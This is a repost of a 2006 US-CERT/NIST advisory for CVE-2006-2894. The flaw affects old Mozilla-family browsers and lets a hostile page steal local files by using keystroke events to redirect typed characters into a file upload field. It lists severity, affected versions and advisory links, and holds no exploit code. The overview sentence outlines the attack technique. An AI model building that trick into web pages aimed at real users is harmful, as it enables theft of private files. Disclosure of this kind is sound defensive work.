Mozilla & Co. Vulnerability
Written on 06/08/06 at 10:39:33 PST by Root
Vulnerability
Mozilla & Co. Vulnerability


Vulnerability Summary CVE-2006-2894
Original release date: 6/7/2006
Last revised: 6/8/2006
Source: US-CERT/NIST
 

Overview

Mozilla Firefox 1.5.0.4, Mozilla Suite 1.7.13, Mozilla SeaMonkey 1.0.2, and Netscape 8.1 and earlier allows user-complicit remote attackers to read arbitrary files by tricking a user into typing the characters of the target filename in a text box and using the OnKeyDown, OnKeyPress, and OnKeyUp Javascript keystroke events to change the focus and cause those characters to be inserted into a file upload input control, which can then upload the file when the user submits the form.
 

Impact

CVSS Severity: 3.7 (Low)
Range: Victim must voluntarily interact with attack mechanism
Authentication: Not required to exploit
Impact Type: Allows unauthorized disclosure of information , Allows unauthorized modification
 

References to Advisories, Solutions, and Tools

External Source:  FRSIRT (disclaimer)

Name: ADV-2006-2164

Type:  Advisory
Hyperlink: http://www.frsirt.com/english/advisories/2006/2164
 

External Source:  FRSIRT (disclaimer)

Name: ADV-2006-2163

Type:  Advisory
Hyperlink: http://www.frsirt.com/english/advisories/2006/2163
 

External Source:  FRSIRT (disclaimer)

Name: ADV-2006-2162

Type:  Advisory
Hyperlink: http://www.frsirt.com/english/advisories/2006/2162
 

External Source:  FRSIRT (disclaimer)

Name: ADV-2006-2160

Type:  Advisory
Hyperlink: http://www.frsirt.com/english/advisories/2006/2160
 

External Source:  SECUNIA (disclaimer)

Name: 20472

Type:  Advisory
Hyperlink: http://secunia.com/advisories/20472
 

External Source:  SECUNIA (disclaimer)

Name: 20470

Type:  Advisory
Hyperlink: http://secunia.com/advisories/20470
 

External Source:  SECUNIA (disclaimer)

Name: 20467

Type:  Advisory
Hyperlink: http://secunia.com/advisories/20467
 

External Source:  SECUNIA (disclaimer)

Name: 20442

Type:  Advisory
Hyperlink: http://secunia.com/advisories/20442
 

External Source:  FULLDISC (disclaimer)

Name: 20060605 file upload widgets in IE and Firefox have issues

Hyperlink: http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046610.html
 

Vulnerable software and versions

Mozilla, Firefox, 1.5.0.4

Mozilla, Mozilla Suite, 1.7.13

Mozilla, SeaMonkey, 1.0.2

Netscape, Netscape, 8.1
 

Technical Details

CVSS Base Score Vector: (AV:R/AC:H/Au:NR/C:P/I:P/A:N/B:N) (legend)

Vulnerability Type: Design Error
 

CVE Standard Vulnerability Entry:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2894

~ Utore Security Center
News and Comments Brought to you by: www.unixcoder.org
The comments are owned by the poster. We aren't responsible for its content.